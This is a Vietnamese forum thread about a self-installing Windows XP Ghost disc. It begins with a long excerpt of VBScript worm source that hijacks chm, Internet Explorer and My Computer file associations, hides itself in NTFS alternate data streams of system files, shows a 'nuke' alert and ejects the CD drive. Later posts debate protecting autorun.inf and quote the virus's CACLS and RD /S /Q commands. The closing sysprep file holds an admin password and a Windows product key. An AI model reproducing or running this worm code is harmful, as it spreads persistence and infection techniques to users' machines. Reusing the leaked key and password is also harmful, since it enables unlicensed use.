Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell \open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SetIEAss(sFilePath)
on Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " OIE "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\i explore.exe\shell\open\command\", Value, "REG_EXPAND_SZ")
Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SetMyComputerAss(sFilePath)
on Error Resume Next
Dim Value1,Value2
Value1 = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " OMC "
Value2 = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " EMC "
Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\", "", "REG_SZ")
Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\open\command\", Value1, "REG_EXPAND_SZ")
Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\explore\command\", Value2, "REG_EXPAND_SZ")
End Sub
Function GetSerialNumber(Drv)
on Error Resume Next
Set d = fso.GetDrive(Drv)
GetSerialNumber = d.SerialNumber
GetSerialNumber = Replace(GetSerialNumber,"-","")
End Function
Function GetMainVirus(N)
on Error Resume Next
MainVirusName = GetSerialNumber(GetSystemDrive()) & ".vbs"
If GetFileSystemType(GetSystemDrive()) = "NTFS" Then
If N = 1 Then
GetMainVirus = Fso.GetSpecialFolder(N) & "\smss.exe:" & MainVirusName
End If
If N = 0 Then
GetMainVirus = Fso.GetSpecialFolder(N) & "\explorer.exe:" & MainVirusName
End If
Else
GetMainVirus = Fso.GetSpecialFolder(N) & "\" & MainVirusName
End If
End Function
Function VBSProcessCount(VBSPath)
on Error Resume Next
Dim WMIService, ProcessList, Process
VBSProcessCount = 0
Set WMIService = GetObject("winmgmts:\\.\root\cimv2")
Set ProcessList = WMIService.ExecQuery("Select * from Win32_Process Where " & "Name='cscript.exe' or Name='wscript.exe' or Name='svchost.exe'")
For Each Process In ProcessList
If InStr(Process.CommandLine, VBSPath) > 0 Then
VBSProcessCount = VBSProcessCount + 1
End If
Next
End Function
Function PreDblInstance()
on Error Resume Next
PreDblInstance = False
If VBSProcessCount(WScript.ScriptFullName) >= 3 Then
PreDblInstance = True
End If
End Function
Function GetTargetPath(LnkPath)
on Error Resume Next
Dim Shortcut
Set Shortcut = WshShell.CreateShortcut(LnkPath)
GetTargetPath = Shortcut.TargetPath
End Function
Function GetCode(FullPath)
on Error Resume Next
Dim FileText
Set FileText = FSO.OpenTextFile(FullPath, 1)
GetCode = FileText.ReadAll
FileText.Close
End Function
Function GetVersion()
Dim VerInfo
VerInfo = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Ver"
If ReadReg(VerInfo) = "" Then
GetVersion = 0
Else
GetVersion = CInt(ReadReg(VerInfo))
End If
End Function
Sub VirusAlert()
on Error Resume Next
Dim HtaPath,HtaCode
HtaPath = Fso.GetSpecialFolder(1) & "\BFAlert.hta"
HtaCode = "<HTML><HEAD><TITLE>nuke</TITLE>" & vbCrLf & "<HTA:APPLICATION APPLICATIONNAME=""BoyFine V1.0"" SCROLL=""no"" windowstate=""maximize"" border=""none""" & vbCrLf & "SINGLEINSTANCE=""yes"" CAPTION=""no"" contextMenu=""no"" ShowInTaskBar=""no"" selection=""no"">" & vbCrLf & "</HEAD><BODY bgcolor=#000000><DIV align =""center"">" & vbCrLf & "<font style=""font-size:3500%;font-family:Wingdings;color=red"">N</font><BR>" & vbCrLf & "<font style=""font-size:200%;font-family:ºÚÌå;color=red"">nuke </font>" & vbCrLf & "</DIV></BODY></HTML>"
If FSO.FileExists(HtaPath) = False Then
Call CreateFile(HtaCode, HtaPath)
Call SetHiddenAttr(HtaPath)
End If
Call Run(HtaPath)
End Sub
Function GetInfectedDate()
on Error Resume Next
Dim DateInfo
DateInfo = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Date"
If ReadReg(DateInfo) = "" Then
GetInfectedDate = ""
Else
GetInfectedDate = CDate(ReadReg(DateInfo))
End If
End Function
Sub MakeJoke(Times)
on Error Resume Next
Dim WMP, colCDROMs
Set WMP = CreateObject("WMPlayer.OCX")
Set colCDROMs = WMP.cdromCollection
If colCDROMs.Count > 0 Then
For i = 1 To Times
colCDROMs.Item(0).eject()
WScript.Sleep 3000
colCDROMs.Item(0).eject()
Next
End If
Set WMP = Nothing
End Sub

Mình nghĩ các bạn làm phức tạp hóa vấn đề về file atuorun.inf. Cứ login vào bằng administrator, vào tools/folder options.../view, unchecked vào Use simple file sharing, bật ẩn file, bật hiển thị đuôi file, rồi tạo file autorun.inf, vào thuộc tính của file, mục general chọn read only, hidden, mục securiy deny full control của tất cả các user/group khác, đặt mật khẩu cho administrator là ok.
Còn driver đó là driver sưu tập từ driver của hầu hết các main thông dụng rồi nén lại bằng 7zip có dung lượng dưới 100Mb, còn khi bung ra thì gần đầy 1 đĩa CD, không thể nói là main tạm thời đc, ko 1 ai có thể tự tạo ra driver ngoài hãng sản xuất phần cứng đó mà nó nhận được cả.

Mình nghĩ các bạn làm phức tạp hóa vấn đề về file atuorun.inf. Cứ login vào bằng administrator, vào tools/folder options.../view, unchecked vào Use simple file sharing, bật ẩn file, bật hiển thị đuôi file, rồi tạo file autorun.inf, vào thuộc tính của file, mục general chọn read only, hidden, mục securiy deny full control của tất cả các user/group khác, đặt mật khẩu cho administrator là ok.

Không phải là làm phức tạp hóa vấn đề mà là bạn nghĩ vấn đề nó đơn giản quá. Tôi đã nói rồi, đã là virus thì hầu hết trước khi nhiễm nó đều lưu tất cả các thuộc tính của file chuẩn bị lây và sau đó là nó sẽ đặt lại thuộc tính để có thể làm gì thì làm, sau khi lây xong nó lại trả lại thuộc tính như ban đầu. Tuy nhiên, con virus Autorun này thì có hơi khác, phiên bản sau này nó cũng chẳng cần kiểm tra và lưu thuộc tính làm gì, nó cứ chép nguyên bản file autorun.inf vào ổ đĩa sau 1 khoảng thời gian hay có thao tác nào đó với ổ đĩa cho dù trên ổ đó đã có chính file autorun.inf của nó rồi.
Cách của bạn cũng không ăn thua đâu, sau khi tạo xong file autorun.inf như bạn hướng dẫn bạn thử down cái tiện ích này về xem có xóa được không? http://www.webtretho.com/forum/showthread.php?t=83095
Hay nếu không có tiện ích nào thì bạn thử dùng câu lệnh này xem sao
cacls c:\autorun.inf /P: everyone:f (ở đây là file autorun.inf bạn để ở trên ổ C:)
Khi nó hỏi Are you sure ? bạn ấn chữ Y trên bàn phím rồi xóa thử file đó xem sao?
Còn virus Autorun ư? Nó làm tự động hết bằng câu lệnh DOS: CMD /C
đây là 2 dòng code trích ở bên trên để virus đặt lại thuộc tính Full control cho everyone:
WshSHell.Run ("CMD /C CACLS " & """" & ImmunityFolder & """" & " /t /e /c /g everyone:f"),vbHide,True
WshSHell.Run ("CMD /C RD /S /Q " & ImmunityFolder), vbHide, True

Cảm ơn nhiều nhé! Mình đang cần tìm phiên bản mới này.
Mà cho mình xin phép được đổi bản quyền tác giả trong đĩa nhé.

Mà cho mình xin phép được đổi bản quyền tác giả trong đĩa nhé.

OK luôn.


Không phải là làm phức tạp hóa vấn đề mà là bạn nghĩ vấn đề nó đơn giản quá.

Mình ko có ý tranh cãi nhau với bạn đâu nhé!

Mình xin phép nói thế này: Bạn ko hiểu sâu về hệ thống Windows và cách làm việc của nó, khi chạy 1 lệnh bất kỳ thì lệnh đó phải được chạy dựa trên user nào, nếu virus không lựa chọn nâng cao thì nó chạy trên user hiện đang logon, user đang logon đó ko có quyền truy cập vào file nào thì lệnh đó xem như thực hiện ko thành công, nếu có lựa chọn nâng cao thì nó thường chọn user có quyền cao nhất là administrator và khi chạy 1 lệnh với user không phải là user hiện thời thì nó phải cung cấp mật khẩu, nên nếu virus chạy với quyền administrator thì nó để trống mật khẩu nếu không được sẽ cố gắng chạy với những mật khẩu mà người dùng hay đặt như: 123456, Administrator, administrator, admin, ..., khi bạn đặt mật khẩu mà nó ko dò ra thì nó ko thể thực thi được lệnh nó mong muốn. Như mình đã nói ở trên điểm nhấn là chúng ta tạo ra file autorun.inf bằng tài khoản administrator nghĩa là chỉ có administrator mới có quyền xóa file này nếu như deny tất cả các user, còn nếu bạn tạo file autorun.inf với tài khoản sử dụng thì dù bạn có deny quyền của user này thì nó vẫn xóa đc (bạn vẫn xóa đc) vì tài khoản này có quyền create thì nó có quyền delete là điều đương nhiên.
Cách làm của mình tuy là đơn giản nhưng ẩn chứa những ý nghĩa ẩn bên trong, nếu trong các bạn có ai ko tin thì cứ bung ghost ra rồi làm giống như virus đã làm xem kết quả thế nào.

Cách làm của mình tuy là đơn giản nhưng ẩn chứa những ý nghĩa ẩn bên trong, nếu trong các bạn có ai ko tin thì cứ bung ghost ra rồi làm giống như virus đã làm xem kết quả thế nào.

bạn chờ mình download về test thử rồi trả lời nhé

Tình hình thế nào rồi mọi người

Trong bộ ghost 1 CD bị lỗi file NamPT Ghost CD.part2.rar không thể download được. Bạn xem lại giùm mình, không biết mình download file tại bộ ghost 1,1gb có được không.

Bạn xóa cookie ở trình duyệt là download đc, hoặc đổi trình duyệt, hoặc khởi động lại

các bạn cho minh hỏi cái này tí: mình đã làm được bản ghost tự nhận driver rồi, nhưng mình không biết làm thế nào để khi bỏ đĩa cd vào nó tự chạy như đĩa của Phan Thanh Nam, mình không hiểu về các câu lệnh trong dos lắm, các bạn giúp mình với.

mình không thay thế đuợc cái anh logo là thế nào nhỉ
làm thế nào để thay đổi được cái ảnh đó bằng ảnh của mình

Bản win này có ngon hơn bản XP OEM của Dell không hả mọi người ?
Đang tính cài lại win cho giàn nét

các bạn cho minh hỏi cái này tí: mình đã làm được bản ghost tự nhận driver rồi, nhưng mình không biết làm thế nào để khi bỏ đĩa cd vào nó tự chạy như đĩa của Phan Thanh Nam, mình không hiểu về các câu lệnh trong dos lắm, các bạn giúp mình với.

Bạn vào đây http://nampt.com/CNTT/Thu-thuat/NamPT-Ghost-CD-Dia-Ghost-tu-nhan-driver-1-CD-duy-nhat-tich-hop-khoi-dong-DOS/Default.aspx để lấy phiên bản mới nhất rồi tạo file ghost, sau đó đổi tên thành nampt.gho rồi thay thế vào file iso (áp dụng theo hướng dẫn mà làm) bạn sẽ đc 1 bản ghost của chính bạn 100%

cảm ơn bạn, để mình làm thử.

Xin cam on . Cai nay minh dang can ...

thật là hay đấy. Cám ơn đồng chí rất nhiều.

minh thay ban nay hay day chu!co le cac ban chua gap pai tinh trang tai drive chinh xac ma cai mai van khong duoc(danh cho laptop doi moi bay gio.Nhung bo cai dia ghost nay vao la ok het.THANK BAC NAM NHA!BAC CO CAI GI HAY THI SHARE QUA MAIL CHO EM VOI"tansinhit@gmail.com"

Trước tiên mình rất cảm ơn bạn về File NamPT Ghost mà bạn đã up lên diễn đàn cho mọi người sử dụng, đây cũng là (file mở) có thể chỉnh sửa lại theo ý riêng để tiện sử dụng. 1 lần nữa tôi rất cảm ơn bạn và cũng có vài ý muốn hỏi bạn giúp thêm mong bạn vui lòng.
Trong ghostPT của bạn tôi khi đã thay ảnh nền logo.bmp và có thể chỉnh nội dung file SysPrep.inf chỉ trong phần [UserData] 3 mục thôi.Xin hỏi bản ghost của bạn vẫn sử dụng lại được ?
cụ thể là :
;SetupMgrTag
[Unattended]
OEMPnPDriversPath="%systemdrive%\inf"
OemSkipEula=Yes
DriverSigningPolicy=Ignore
NonDriverSigningPolicy=Ignore

[GuiUnattended]
AdminPassword=nampt.com
EncryptedAdminPassword=NO
OEMSkipRegional=1
TimeZone=205
OemSkipWelcome=1

[UserData]
ProductKey=K2KB2-BDBGV-KP686-D8T7X-HDMQ8
FullName="Customer" (Phần này tôi thay (Customer) thành tên khác)
OrgName="NPT" (Phần này tôi thay (NPT) thành tên khác)
ComputerName=NPT (Phần này tôi thay (NPT) thành tên khác)

[RegionalSettings]
LanguageGroup=7,9,10

[Identification]
JoinWorkgroup=WORKGROUP

[Networking]
InstallDefaultComponents=Yes
[sysprepcleanup]